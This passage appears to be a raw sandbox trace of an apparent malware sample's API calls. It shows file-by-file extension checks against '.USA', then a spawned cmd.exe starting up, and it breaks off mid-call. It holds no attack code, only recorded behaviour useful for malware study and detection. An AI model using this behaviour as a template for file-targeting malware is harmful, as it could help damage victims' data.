(lpString1=".efd", lpString2=".USA") returned -1 [0263.767] lstrlenW (lpString=".elf") returned 4 [0263.767] lstrcmpiW (lpString1=".elf", lpString2=".USA") returned -1 [0263.767] lstrlenW (lpString=".emf") returned 4 [0263.767] lstrcmpiW (lpString1=".emf", lpString2=".USA") returned -1 [0263.767] lstrlenW (lpString=".emz") returned 4 [0263.768] lstrcmpiW (lpString1=".emz", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".epf") returned 4 [0263.768] lstrcmpiW (lpString1=".epf", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".eps") returned 4 [0263.768] lstrcmpiW (lpString1=".eps", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".epsf") returned 5 [0263.768] lstrcmpiW (lpString1=".epsf", lpString2="].USA") returned -1 [0263.768] lstrlenW (lpString=".epsp") returned 5 [0263.768] lstrcmpiW (lpString1=".epsp", lpString2="].USA") returned -1 [0263.768] lstrlenW (lpString=".erf") returned 4 [0263.768] lstrcmpiW (lpString1=".erf", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".exr") returned 4 [0263.768] lstrcmpiW (lpString1=".exr", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".f4v") returned 4 [0263.768] lstrcmpiW (lpString1=".f4v", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".fido") returned 5 [0263.768] lstrcmpiW (lpString1=".fido", lpString2="].USA") returned -1 [0263.768] lstrlenW (lpString=".flm") returned 4 [0263.768] lstrcmpiW (lpString1=".flm", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".flv") returned 4 [0263.768] lstrcmpiW (lpString1=".flv", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".frm") returned 4 [0263.768] lstrcmpiW (lpString1=".frm", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".fxg") returned 4 [0263.768] lstrcmpiW (lpString1=".fxg", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".geo") returned 4 [0263.768] lstrcmpiW (lpString1=".geo", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".gif") returned 4 [0263.768] lstrcmpiW (lpString1=".gif", lpString2=".USA") returned -1 [0263.768] lstrlenW (lpString=".grs") returned 4 [0263.768] lstrcmpiW (lpString1=".grs", lpString2=".USA") returned -1 [0263.943] FindNextFileW (in: hFindFile=0x59ad08, lpFindFileData=0x3bcf094 | out: lpFindFileData=0x3bcf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0263.943] FindNextFileW (in: hFindFile=0x59ad08, lpFindFileData=0x3bcf094 | out: lpFindFileData=0x3bcf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 Thread: id = 67 os_tid = 0x6a8 Thread: id = 68 os_tid = 0x6b4 Thread: id = 70 os_tid = 0x6bc Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x6f863000" os_pid = "0x608" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x53c" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e656" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 48 os_tid = 0x60c [0262.304] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1bfac0 | out: lpSystemTimeAsFileTime=0x1bfac0*(dwLowDateTime=0xdb0ea940, dwHighDateTime=0x1d53e4e)) [0262.304] GetCurrentProcessId () returned 0x608 [0262.304] GetCurrentThreadId () returned 0x60c [0262.304] GetTickCount () returned 0x6e8a [0262.305] QueryPerformanceCounter (in: lpPerformanceCount=0x1bfac8 | out: lpPerformanceCount=0x1bfac8*=7159182211) returned 1 [0262.305] GetModuleHandleW (lpModuleName=0x0) returned 0x4a060000 [0262.305] __set_app_type (_Type=0x1) [0262.306] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a087810) returned 0x0 [0262.306] __getmainargs (in: _Argc=0x4a0aa608, _Argv=0x4a0aa618, _Env=0x4a0aa610, _DoWildCard=0, _StartInfo=0x4a08e0f4 | out: _Argc=0x4a0aa608, _Argv=0x4a0aa618, _Env=0x4a0aa610) returned 0 [0262.307] GetCurrentThreadId () returned 0x60c [0262.307] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x60c) returned 0x3c [0262.307] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x775a0000 [0262.307] GetProcAddress (hModule=0x775a0000, lpProcName="SetThreadUILanguage") returned 0x775b6d40 [0262.307] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0262.307] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0262.307] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1bfa58 | out: phkResult=0x1bfa58*=0x0) returned 0x2 [0262.307] VirtualQuery (in: lpAddress=0x1bfa40, lpBuffer=0x1bf9c0, dwLength=0x30 | out: lpBuffer=0x1bf9c0*(BaseAddress=0x1bf000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0262.308] VirtualQuery (in: lpAddress=0xc0000, lpBuffer=0x1bf9c0, dwLength=0x30 | out: lpBuffer=0x1bf9c0*(BaseAddress=0xc0000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0262.308] VirtualQuery (in: lpAddress=0xc1000, lpBuffer=0x1bf9c0, dwLength=0x30 | out: lpBuffer=0x1bf9c0*(BaseAddress=0xc1000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0262.308] VirtualQuery (in: lpAddress=0xc4000, lpBuffer=0x1bf9c0, dwLength=0x30 | out: lpBuffer=0x1bf9c0*(BaseAddress=0xc4000, AllocationBase=0xc0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0262.308] VirtualQuery (in: lpAddress=0x1c0000, lpBuffer=0x1bf9c0, dwLength=0x30 | out: lpBuffer=0x1bf9c0*(BaseAddress=0x1c0000, AllocationBase=0x1c0000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0262.308] GetConsoleOutputCP () returned 0x1b5 [0262.308] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a09bfe0 | out: lpCPInfo=0x4a09bfe0) returned 1 [0262.309] SetConsoleCtrlHandler (HandlerRoutine=0x4a083184, Add=1) returned 1 [0262.309] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.309] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0262.309] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.309] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a08e194 | out: lpMode=0x4a08e194) returned 0 [0262.309] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.309] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a08e198 | out: lpMode=0x4a08e198) returned 0 [0262.309] GetEnvironmentStringsW () returned 0x298aa0* [0262.309] GetProcessHeap () returned 0x280000 [0262.309] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xab4) returned 0x299560 [0262.309] FreeEnvironmentStringsW (penv=0x298aa0) returned 1 [0262.309] GetProcessHeap () returned 0x280000 [0262.310] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x8) returned 0x298920 [0262.310] GetEnvironmentStringsW () returned 0x298aa0* [0262.310] GetProcessHeap () returned 0x280000 [0262.310] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xab4) returned 0x29a020 [0262.310] FreeEnvironmentStringsW (penv=0x298aa0) returned 1 [0262.310] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1be918 | out: phkResult=0x1be918*=0x44) returned 0x0 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x0, lpData=0x1be930*=0x18, lpcbData=0x1be914*=0x1000) returned 0x2 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x4, lpData=0x1be930*=0x1, lpcbData=0x1be914*=0x4) returned 0x0 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x0, lpData=0x1be930*=0x1, lpcbData=0x1be914*=0x1000) returned 0x2 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x4, lpData=0x1be930*=0x0, lpcbData=0x1be914*=0x4) returned 0x0 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x4, lpData=0x1be930*=0x40, lpcbData=0x1be914*=0x4) returned 0x0 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x4, lpData=0x1be930*=0x40, lpcbData=0x1be914*=0x4) returned 0x0 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x0, lpData=0x1be930*=0x40, lpcbData=0x1be914*=0x1000) returned 0x2 [0262.310] RegCloseKey (hKey=0x44) returned 0x0 [0262.310] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1be918 | out: phkResult=0x1be918*=0x44) returned 0x0 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x0, lpData=0x1be930*=0x40, lpcbData=0x1be914*=0x1000) returned 0x2 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x4, lpData=0x1be930*=0x1, lpcbData=0x1be914*=0x4) returned 0x0 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x0, lpData=0x1be930*=0x1, lpcbData=0x1be914*=0x1000) returned 0x2 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x4, lpData=0x1be930*=0x0, lpcbData=0x1be914*=0x4) returned 0x0 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x4, lpData=0x1be930*=0x9, lpcbData=0x1be914*=0x4) returned 0x0 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x4, lpData=0x1be930*=0x9, lpcbData=0x1be914*=0x4) returned 0x0 [0262.310] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1be910, lpData=0x1be930, lpcbData=0x1be914*=0x1000 | out: lpType=0x1be910*=0x0, lpData=0x1be930*=0x9, lpcbData=0x1be914*=0x1000) returned 0x2 [0262.310] RegCloseKey (hKey=0x44) returned 0x0 [0262.310] time (in: timer=0x0 | out: timer=0x0) returned 0x5d31ef70 [0262.310] srand (_Seed=0x5d31ef70) [0262.310] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0262.310] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\"" [0262.311] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a09c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0262.311] GetProcessHeap () returned 0x280000 [0262.311] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x218) returned 0x29aae0 [0262.311] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29aaf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0262.312] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0262.312] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0262.312] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0262.312] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0262.312] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0262.312] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0262.312] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0262.312] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0262.312] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0262.312] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0262.312] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0262.312] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0262.312] GetProcessHeap () returned 0x280000 [0262.312] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x299560 | out: hHeap=0x280000) returned 1 [0262.312] GetEnvironmentStringsW () returned 0x298aa0* [0262.312] GetProcessHeap () returned 0x280000 [0262.312] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xacc) returned 0x29ad00 [0262.312] FreeEnvironmentStringsW (penv=0x298aa0) returned 1 [0262.312] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0262.312] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a08f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0262.312] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0262.312] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0262.312] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0262.312] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0262.312] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0262.312] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0262.312] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0262.312] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0262.313] GetProcessHeap () returned 0x280000 [0262.313] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x38) returned 0x2964d0 [0262.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1bf720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0262.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x1bf720, lpFilePart=0x1bf700 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1bf700*="system32") returned 0x13 [0262.313] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0262.313] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x1bf430 | out: lpFindFileData=0x1bf430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x59000158, cFileName="Windows", cAlternateFileName="")) returned 0x29b7e0 [0262.313] FindClose (in: hFindFile=0x29b7e0 | out: hFindFile=0x29b7e0) returned 1 [0262.313] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x1bf430 | out: lpFindFileData=0x1bf430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x11ff8f90, ftLastAccessTime.dwHighDateTime=0x1d53e5f, ftLastWriteTime.dwLowDateTime=0x11ff8f90, ftLastWriteTime.dwHighDateTime=0x1d53e5f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x59000158, cFileName="System32", cAlternateFileName="")) returned 0x29b7e0 [0262.313] FindClose (in: hFindFile=0x29b7e0 | out: hFindFile=0x29b7e0) returned 1 [0262.313] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0262.313] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0262.313] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0262.313] GetProcessHeap () returned 0x280000 [0262.313] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ad00 | out: hHeap=0x280000) returned 1 [0262.313] GetEnvironmentStringsW () returned 0x29ad00* [0262.313] GetProcessHeap () returned 0x280000 [0262.313] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xafc) returned 0x298aa0 [0262.313] FreeEnvironmentStringsW (penv=0x29ad00) returned 1 [0262.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a09c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0262.313] GetProcessHeap () returned 0x280000 [0262.313] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2964d0 | out: hHeap=0x280000) returned 1 [0262.313] GetProcessHeap () returned 0x280000 [0262.313] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4016) returned 0x29ad00 [0262.314] GetProcessHeap () returned 0x280000 [0262.314] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x29ad00 | out: hHeap=0x280000) returned 1 [0262.314] GetConsoleOutputCP () returned 0x1b5 [0262.314] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a09bfe0 | out: lpCPInfo=0x4a09bfe0) returned 1 [0262.314] GetUserDefaultLCID () returned 0x409 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a097b50, cchData=8 | out: lpLCData=":") returned 2 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1bf830, cchData=128 | out: lpLCData="0") returned 2 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1bf830, cchData=128 | out: lpLCData="0") returned 2 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1bf830, cchData=128 | out: lpLCData="1") returned 2 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a0aa740, cchData=8 | out: lpLCData="/") returned 2 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a0aa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a0aa460, cchData=32 | out: lpLCData="Tue") returned 4 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a0aa420, cchData=32 | out: lpLCData="Wed") returned 4 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a0aa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a0aa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a0aa360, cchData=32 | out: lpLCData="Sat") returned 4 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a0aa700, cchData=32 | out: lpLCData="Sun") returned 4 [0262.314] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a097b40, cchData=8 | out: lpLCData=".") returned 2 [0262.315] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a0aa4e0, cchData=8 | out: lpLCData=",") returned 2 [0262.315] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0262.315] GetProcessHeap () returned 0x280000 [0262.315] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20c) returned 0x299620 [0262.315] GetConsoleTitleW (in: lpConsoleTitle=0x299620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0262.316] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.316] GetFileType (hFile=0xf4) returned 0x3 [0262.316] BrandingFormatString () returned 0x299840 [0262.320] GetVersion () returned 0x1db10106 [0262.320] _vsnwprintf (in: _Buffer=0x1bf9a0, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x1bf938 | out: _Buffer="6.1.7601") returned 8 [0262.320] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.320] GetFileType (hFile=0xf4) returned 0x3 [0262.320] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a0a6340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e [0262.321] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a0a6340, nSize=0x2000, Arguments=0x1bf940 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24 [0262.321] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.321] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37 [0262.321] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x1bf8c8, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf8c8*=0x24, lpOverlapped=0x0) returned 1 [0262.321] _vsnwprintf (in: _Buffer=0x4a0a6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1bf968 | out: _Buffer="\r\n") returned 2 [0262.321] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.321] GetFileType (hFile=0xf4) returned 0x3 [0262.321] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.321] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0262.321] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bf938, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf938*=0x2, lpOverlapped=0x0) returned 1 [0262.321] _vsnwprintf (in: _Buffer=0x4a0a6340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x1bf968 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation. All rights reserved.") returned 63 [0262.321] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.322] GetFileType (hFile=0xf4) returned 0x3 [0262.322] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.322] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation. All rights reserved.", lpUsedDefaultChar=0x0) returned 64 [0262.322] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x1bf938, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf938*=0x3f, lpOverlapped=0x0) returned 1 [0262.322] _vsnwprintf (in: _Buffer=0x4a0a6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1bf968 | out: _Buffer="\r\n") returned 2 [0262.322] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.322] GetFileType (hFile=0xf4) returned 0x3 [0262.322] _get_osfhandle (_FileHandle=1) returned 0xf4 [0262.322] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a09c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0262.322] WriteFile (in: hFile=0xf4, lpBuffer=0x4a09c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bf938, lpOverlapped=0x0 | out: lpBuffer=0x4a09c320*, lpNumberOfBytesWritten=0x1bf938*=0x2, lpOverlapped=0x0) returned 1 [0262.322] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x775a0000 [0262.322] GetProcAddress (hModule=0x775a0000, lpProcName="CopyFileExW") returned 0x775b23d0 [0262.322] GetProcAddress (hModule=0x775a0000, lpProcName="IsDebuggerPresent") returned 0x775a8290 [0262.322] GetProcAddress (hModule=0x775a0000, lpProcName="SetConsoleInputExeNameW") returned 0x775b17e0 [0262.322] _get_osfhandle (_FileHandle=0) returned 0xe8 [0262.322] GetFileType (hFile=0xe8) returned 0x3 [0262.322] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0262.323] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, 